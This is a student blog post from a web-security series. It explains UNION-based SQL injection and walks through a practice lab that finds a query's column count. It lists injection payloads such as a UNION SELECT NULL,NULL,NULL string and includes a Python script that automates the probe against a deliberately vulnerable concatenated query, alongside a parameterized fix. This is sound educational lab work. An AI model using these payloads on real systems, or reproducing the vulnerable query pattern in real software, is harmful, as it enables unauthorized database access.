
SQL Injection - SQL Injection UNION Attacks

Author: Nguyen Hoang Thanh Phong
Senior Information Assurance student at FPT University, focused on web vulnerability exploitation, AWS security architecture, and building automated penetration tooling.
Web Security IAW301 - This article is part of a series.
Part 9: This Article

Q&A

1. What is a Union-Based SQL Injection attack, and how does it differ from other types of SQL injection attacks?

Union-Based SQL Injection is a type of SQL Injection attack in which an attacker uses the UNION SQL operator to append one or more malicious SELECT queries to the original query used by the web application.

This technique is effective when the application displays the results of the SQL query in its HTTP response. In that case, the attacker can make the application return data from other database tables and display it on the web page.

Union-Based SQL Injection differs from other types of SQL Injection because it focuses on extracting data directly through the application’s visible response. In contrast, Blind SQL Injection usually requires the attacker to infer information based on true/false responses or response timing because the application does not directly display the query results.

2. Explain the role of the UNION SQL operator in this type of attack and how it can be used to extract data from a database that is not typically accessible through the intended use of a web application.

The UNION SQL operator is used to combine the results of two or more SELECT queries into a single result set. In a Union-Based SQL Injection attack, the attacker injects a UNION SELECT statement into a vulnerable parameter so that the database executes both the original query and the attacker’s additional query.

For example, if a web application is designed to display product information, an attacker may use UNION SELECT to retrieve data from another table, such as a users table. This allows the attacker to make the application display information that would not normally be accessible through its intended functionality, such as usernames or passwords.

To perform this attack successfully, the attacker must usually determine the correct number of columns returned by the original query. The injected UNION SELECT query must return the same number of columns, and the data types must be compatible with the original query.

SQL Injection UNION Attack: Determining the Number of Columns Returned by the Query

1. Accessing the lab

This lab requires us to perform a SQL Injection UNION attack in order to determine the number of columns returned by the original SQL query. The objective is to inject a row containing NULL values using the UNION SELECT operator.

First, I accessed the lab homepage.

Screenshot: Homepage

2. Testing the vulnerable parameter

At first, I did not know which parameter was vulnerable to SQL Injection. Based on the URL structure, the application uses the /filter endpoint with the category parameter, for example:

/filter?category=Pets

To test whether the category parameter was vulnerable, I added a single quote after the value Pets:

/filter?category=Pets'

After adding the single quote, the application returned an Internal Server Error. This indicated that the input was being processed inside a SQL query and that the query syntax was broken by the injected quote.

Screenshot: Internal Server Error

3. Confirming SQL Injection

Next, I tested a basic SQL Injection condition by adding an always-true condition:

Pets' OR '1'='1

The page returned to a normal state and displayed product results. This confirmed that the category parameter was vulnerable to SQL Injection.

Screenshot: SQL Injection at the category parameter

4. Determining the number of columns

After confirming the SQL Injection vulnerability, I used the UNION SELECT technique with NULL values to determine the number of columns returned by the original query.

I tested the following payload:

Pets' UNION SELECT NULL,NULL,NULL-- -

The lab was solved when I used three NULL values. This means that the original SQL query returned three columns: a UNION SELECT with three NULLs matches that column count (and NULL is compatible with every column type), whereas any other number of NULLs makes the database reject the combined query.

Screenshot: Success
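The column-count probe from step 4 and the UNION mechanics described in Q&A 2, replayed against a constructed SQLite database (an added example, not code from the original write-up or from the lab): the concatenated query breaks on a lone quote, accepts a UNION SELECT only when the NULL count matches its three columns, and a parameterized version of the same query treats the payload as an ordinary string. The table, column names and rows are assumptions.

```python
import sqlite3

# Constructed schema standing in for the lab's product listing (assumption: the
# lab's real table and column names are not shown in the write-up).
SCHEMA = """
CREATE TABLE products (name TEXT, description TEXT, price REAL, category TEXT);
INSERT INTO products VALUES ('Dog Bowl', 'Steel bowl', 9.5, 'Pets');
INSERT INTO products VALUES ('Cat Toy', 'Feather wand', 4.0, 'Pets');
INSERT INTO products VALUES ('Desk Lamp', 'LED lamp', 20.0, 'Home');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def filter_vulnerable(conn, category):
    # The /filter?category=... value is concatenated into the SQL text, so a quote
    # in the value closes the string literal and the remainder is parsed as SQL.
    sql = f"SELECT name, description, price FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def filter_parameterized(conn, category):
    # Bound parameter: the value is passed as data and cannot change the query.
    sql = "SELECT name, description, price FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def query_breaks(conn, value):
    """True when the value makes the concatenated query fail; the lab's lone-quote
    test produced an Internal Server Error for the same reason."""
    try:
        filter_vulnerable(conn, value)
        return False
    except sqlite3.OperationalError:
        return True


def probe_column_count(conn, max_cols=6):
    """Replay step 4: add one NULL at a time; the first count that does not break
    the query equals the number of columns the original SELECT returns."""
    for n in range(1, max_cols + 1):
        payload = "Pets' UNION SELECT " + ",".join(["NULL"] * n) + "-- -"
        if not query_breaks(conn, payload):
            return n
    return None


if __name__ == "__main__":
    db = make_db()
    print("columns:", probe_column_count(db))  # 3
    print("parameterized:", filter_parameterized(db, "Pets' UNION SELECT NULL,NULL,NULL-- -"))  # []
```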

Conclusion

In this lab, I successfully identified a SQL Injection vulnerability in the category parameter of the /filter endpoint. By injecting a single quote, I triggered a server-side SQL error. Then, I confirmed the vulnerability using an always-true condition.

Finally, I used a Union-Based SQL Injection payload with three NULL values:

' UNION SELECT NULL,NULL,NULL-- -

This successfully determined that the original query returned three columns and completed the lab.
